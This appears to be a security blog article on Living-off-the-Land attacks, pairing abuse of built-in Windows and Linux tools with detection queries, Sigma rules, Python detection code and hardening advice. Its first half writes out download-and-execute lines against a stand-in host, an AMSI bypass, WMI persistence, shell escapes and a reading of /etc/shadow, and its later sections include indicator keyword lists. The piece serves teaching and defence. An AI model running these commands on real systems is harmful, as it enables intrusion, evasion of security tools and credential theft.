Living off the Land (LotL) - LOLBins and LOLBas
Summary: "Living off the Land" (LotL) refers to attack techniques in which attackers use only legitimate tools and utilities already present on the system (LOLBins = Living off the Land Binaries) instead of their own malware. By using PowerShell, WMI, certutil, regsvr32, mshta, and other built-in Windows tools, attackers evade antivirus detection and make forensic attribution more difficult. MITRE ATT&CK: T1218 (System Binary Proxy Execution).
Living off the Land is the stealth concept used by modern attackers: no custom malware that could be detected—instead, exploiting the operating system against itself. PowerShell is a command-line interpreter for administrators—and for attackers. certutil is a certificate management tool—and a downloader. WMI is a management interface—and a persistence technique. LOLBins turn every Windows computer into a potential attacker’s tool.
LOLBins – Living off the Land Binaries
Known LOLBins and their potential uses:
PowerShell (powershell.exe / pwsh.exe):
MITRE: T1059.001
Intended purpose: Scripting, administration
Exploitation:
# Encoded Command (Base64) – avoids logging:
powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AC...
# = Invoke-WebRequest http://c2.evil.com/payload.exe -OutFile shell.exe
# AMSI bypass:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')|
?{$_}|%{$_.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)}
# PowerShell Remoting for lateral movement:
Invoke-Command -ComputerName DC01 -ScriptBlock {whoami}
Enter-PSSession -ComputerName FileServer01
# Download + Execute (without file on disk):
IEX (New-Object Net.WebClient).DownloadString('http://c2.evil.com/payload.ps1')
WMI (Windows Management Instrumentation):
MITRE: T1047
Legitimate Purpose: Hardware queries, software management
Exploitation:
# Remote Process Execution:
wmic /node:192.168.1.10 /user:domain\admin /password:Pass123
process call create "cmd.exe /c calc.exe"
# Persistence via WMI Event Subscription:
# (Starts on system events – survives reboots!)
wmic /namespace:"\\root\subscription" path __EventFilter
create Name="PersistFilter", EventNamespace="root\cimv2",
QueryLanguage="WQL", Query="SELECT * FROM Win32_ModuleLoadTrace"
CertUtil (certutil.exe):
MITRE: T1105 (Ingress Tool Transfer)
Normal purpose: Certificate management, PKI
Misuse:
# Download files (bypasses simple proxy filters!):
certutil.exe -urlcache -split -f "http://c2.evil.com/payload.exe" payload.exe
# Base64 decoding:
certutil.exe -decode encoded.txt payload.exe
# (Attacker delivers Base64-encoded payload as a .txt file)
# Clearing the URL cache (covering tracks):
certutil.exe -urlcache -split -f "http://c2.evil.com/payload.exe" delete
MSHta (mshta.exe):
MITRE: T1218.005
Normal purpose: HTML Application Host (HTA files)
Abuse:
# Execute remote HTA:
mshta.exe "http://c2.evil.com/evil.hta"
# HTA = HTML + VBScript/JScript → full script access!
# Phishing: "Please open the HTA file" instead of .exe → often not blocked
regsvr32 (regsvr32.exe):
MITRE: T1218.010
Normal purpose: Register COM objects
Abuse (Squiblydoo):
# Load and execute a remote COM object:
regsvr32.exe /s /n /u /i:"http://c2.evil.com/evil.sct" scrobj.dll
# → SCT file contains JScript/VBScript
# → regsvr32 is signed by Microsoft → often bypasses AppLocker!
rundll32 (rundll32.exe):
MITRE: T1218.011
Normal purpose: Call DLL function
Abuse:
# Load URL to JavaScript as a DLL:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";...
# Execute custom DLL:
rundll32.exe C:\Users\Public\evil.dll,EntryPoint
wscript / cscript:
MITRE: T1059.005
Normal purpose: Execute VBScript/JScript
Abuse:
wscript.exe //B "\\share\payload.vbs" # Silent mode, no dialogs
BitsAdmin (bitsadmin.exe):
MITRE: T1197
Normal Purpose: Background Intelligent Transfer Service (Windows Update)
Abuse:
# Download:
bitsadmin /transfer "WindowsUpdate" /download /priority high
"http://c2.evil.com/payload.exe" "C:\Windows\Temp\payload.exe"
# Persistence: BITS jobs survive reboots!
LOLBas - Living off the Land-Based Scripts
Beyond Binaries - Scripts and Built-in Features:
Excel/Office Macros (MITRE T1566.001):
→ Phishing: .xlsm, .docm attachment with macro
→ Macro: certutil download + PowerShell execute
→ Modern: also possible in ODF, LibreOffice
Outlook Home Page Attack:
→ Registry: Set Outlook home page to evil.com
→ Persistence: Website loads every time Outlook starts
DLL Hijacking:
→ Legitimate application loads DLL from an insecure path
→ Attacker places their own DLL in the desired location
→ Application loads the attacker's DLL (no code signature required!)
LOLBAS Reference:
→ lolbas-project.github.io: complete list of all known LOLBins
→ 250+ documented Windows binaries with exploitation examples
→ Categories: Execute, Download, Upload, Compile, Copy, Decode
GTFOBins (Linux equivalent):
→ gtfobins.github.io: LOLBins for Linux
→ SUID exploitation, Sudo escape, capability usage
Examples:
# awk as a shell:
awk 'BEGIN {system("/bin/sh")}'
# tar for file exfiltration:
tar -cf /tmp/loot.tar /etc/shadow
# Python for reverse shell:
python3 -c 'import socket,os,pty;s=socket.socket(...)'
Detection of LotL attacks
How EDR/SIEM detects LotL attacks:
Enable PowerShell logging:
# Group Policy: Computer Configuration → Administrative Templates → Windows Components → PowerShell
Turn on Module Logging: ENABLED (all commands)
Turn on PowerShell Script Block Logging: ENABLED (including obfuscated scripts)
Turn on PowerShell Transcription: ENABLED (everything in a log file)
# Event Log: Microsoft-Windows-PowerShell/Operational
# Event ID 4104: Script Block Logging (the actual command content)
# Event ID 4103: Module Logging
# Suspicious PowerShell patterns (Sentinel KQL):
# 4104 events arrive in the Event table (not SecurityEvent); the script text sits
# inside the EventData XML and is pulled out first.
Event
| where Source == "Microsoft-Windows-PowerShell" and EventID == 4104
| extend ScriptBlockText = extract(@'<Data Name="ScriptBlockText">([\s\S]*?)</Data>', 1, EventData)
| where ScriptBlockText has_any
    ("FromBase64String", "IEX", "Invoke-Expression",
     "DownloadString", "WebClient", "AmsiUtils",
     "Bypass", "HideWindow", "EncodedCommand")
| project TimeGenerated, Computer, ScriptBlockText
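As an added example (not from the original article), the same indicator list applied in Python to a process command line whose payload is hidden behind -EncodedCommand, which the KQL hunt above only sees as base64: the encoded argument is decoded (UTF-16LE base64) before the indicators are matched. The sample command line and its host name are constructed.

```python
import base64
import re

# Indicator terms from the KQL hunt above; matched case-insensitively as substrings.
INDICATORS = ("FromBase64String", "IEX", "Invoke-Expression", "DownloadString",
              "WebClient", "AmsiUtils", "Bypass", "HideWindow", "EncodedCommand")

# powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...),
# so the regex lists every prefix, longest first, followed by the base64 blob.
_ENC_FLAGS = "|".join(re.escape("-" + "encodedcommand"[:n]) for n in range(14, 0, -1))
_ENC_RE = re.compile(r"(?i)(?<!\S)(?:%s)\s+([A-Za-z0-9+/=]+)" % _ENC_FLAGS)

def decode_encoded_command(command_line):
    """Return the plaintext of an -EncodedCommand argument (UTF-16LE base64), or None."""
    m = _ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not base64 / odd length: leave to the analyst
        return None

def find_indicators(text):
    """Indicator terms present in a script block or command line, in list order."""
    low = text.lower()
    return [term for term in INDICATORS if term.lower() in low]

def triage(command_line):
    """Decode any encoded command and match indicators on what would really run.
    Returns (decoded_text_or_None, matched_indicators)."""
    decoded = decode_encoded_command(command_line)
    if decoded is None:
        return None, find_indicators(command_line)
    # Swap the opaque base64 blob for its plaintext: indicators are then matched
    # on the real script and never on base64 noise.
    plain = _ENC_RE.sub(" -EncodedCommand ", command_line) + "\n" + decoded
    return decoded, find_indicators(plain)

# Constructed sample: the download cradle shown above, wrapped the way an encoded
# launch hides it (the host is a placeholder, not a real server).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p.ps1')"
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```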
WMI Monitoring:
# Sysmon Event ID 19-21: WMI Event Subscription
# Event ID 20: WMI EventFilter + Consumer: Persistence!
Get-WMIObject -Namespace "root\subscription" -Class __EventFilter
# → If there are unknown filters: Investigate!
Sigma rule for LotL:
title: Living off the Land - CertUtil Download
id: xxx
status: stable
description: CertUtil used for file download (LOLBin abuse)
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    # all three must be present; a plain 'contains' list would OR them and
    # fire on every certutil command line mentioning 'http'
    CommandLine|contains|all:
      - '-urlcache'
      - '-split'
      - 'http'
  condition: selection
level: medium
tags:
  - attack.ingress_tool_transfer
  - attack.t1105
EDR Detection Mechanisms:
→ Behavioral Detection: PowerShell → Network → Exec → Persistence = Suspicious!
→ Process Tree: Word.exe → powershell.exe → curl.exe → SUSPICIOUS
→ Script Analysis: PowerShell script block is checked against patterns
→ API Monitoring: Suspicious API calls (VirtualAlloc + WriteProcessMemory)
→ Parent-Child Anomalies: Excel spawns cmd.exe → ALERT!
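Added example, not part of the original article: the Sigma selection semantics from the rule above (endswith, contains|all) and the parent-child anomaly from the EDR list, evaluated in Python over constructed Sysmon-style process-creation events. The two rule titles other than the certutil one and the host name are assumptions.

```python
# Process-creation rules in Sigma style: a selection is a dict of
# "Field|modifier[|all]" -> value or list of values. Fields are ANDed, list
# values ORed, and "|all" turns the list into AND, as in the certutil rule above.
RULES = [
    ("Living off the Land - CertUtil Download", {
        "Image|endswith": r"\certutil.exe",
        "CommandLine|contains|all": ["-urlcache", "-split", "http"],
    }),
    ("Script host loading remote content", {
        "Image|endswith": [r"\mshta.exe", r"\regsvr32.exe", r"\rundll32.exe"],
        "CommandLine|contains": ["http://", "https://"],
    }),
    ("Office application spawning a shell or script host", {
        "ParentImage|endswith": [r"\winword.exe", r"\excel.exe", r"\outlook.exe"],
        "Image|endswith": [r"\cmd.exe", r"\powershell.exe", r"\wscript.exe", r"\mshta.exe"],
    }),
]

def _field_matches(value, mods, patterns):
    """Sigma string matching: case-insensitive; a list is OR unless 'all' is given."""
    value, mods = value.lower(), set(mods)
    patterns = [p.lower() for p in (patterns if isinstance(patterns, list) else [patterns])]
    tests = {"endswith": value.endswith, "startswith": value.startswith,
             "contains": lambda p: p in value, "equals": lambda p: p == value}
    mod = next((m for m in mods if m in tests), "equals")  # no modifier = exact match
    results = [tests[mod](p) for p in patterns]
    return all(results) if "all" in mods else any(results)

def evaluate(event):
    """Titles of every rule whose selection matches one process-creation event."""
    hits = []
    for title, selection in RULES:
        for key, patterns in selection.items():
            field, *mods = key.split("|")
            if not _field_matches(event.get(field, ""), mods, patterns):
                break
        else:  # every field of the selection matched
            hits.append(title)
    return hits

# Constructed Sysmon-style events (the host is a placeholder, not a real server).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'certutil.exe -urlcache -split -f "http://c2.example.invalid/p.exe" p.exe'},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "certutil.exe -verify cert.cer"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -c Get-Date"},
]
```

Running `evaluate` over SAMPLE_EVENTS flags the first and third event and leaves the legitimate certutil -verify call alone.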
Hardening against LotL:
□ PowerShell: Enforce Constrained Language Mode
# Per session only (a user can simply start a new PowerShell host):
$ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'
# Enforced system-wide through a WDAC or AppLocker script policy, under which
# PowerShell itself switches to Constrained Language Mode
# Drastically limits PowerShell capabilities
□ WDAC (Windows Defender Application Control):
→ Run only signed applications (AppLocker successor)
→ LOLBins can be explicitly blocked (e.g., mshta.exe)
□ Attack Surface Reduction (ASR) Rules (Microsoft Defender):
Block abuse of exploited vulnerable signed drivers
Block credential theft from LSASS
Block Office applications from spawning child processes
Block execution of potentially obfuscated scripts
□ Logging: Enable Script Block Logging + Process Command Line Logging
□ Monitoring: EDR with behavioral detection (CrowdStrike, Defender for Endpoint)
About the Author
Managing partner of AWARE7 GmbH with many years of expertise in information security, penetration testing and IT risk management. Graduate of the Master's programme in Internet Security at Westfälische Hochschule (if(is), Prof. Norbert Pohlmann). Bestselling author published by Wiley-VCH and lecturer at the ASW-Akademie. Assessments on cybersecurity and digital sovereignty have appeared in Welt am Sonntag, WDR, Deutschlandfunk and Handelsblatt, among others.
10 publications
- Einsatz von elektronischer Verschlüsselung - Hemmnisse für die Wirtschaft (2018)
- Kompass IT-Verschlüsselung - Orientierungshilfen für KMU (2018)
- IT Security Day 2025 - Live Hacking: KI in der Cybersicherheit (2025)
- Live Hacking - Credential Stuffing: Finanzrisiken jenseits Ransomware (2025)
- Keynote: Live Hacking Show - Ein Blick in die Welt der Cyberkriminalität (2025)
- Analyse von Angriffsflächen bei Shared-Hosting-Anbietern (2024)
- Gänsehaut garantiert: Die schaurigsten Funde aus dem Leben eines Pentesters (2022)
- IT Security Zertifizierungen - CISSP, T.I.S.P. & Co (Live-Webinar) (2023)
- Sicherheitsforum Online-Banking - Live Hacking (2021)
- Nipster im Netz und das Ende der Kreidezeit (2017)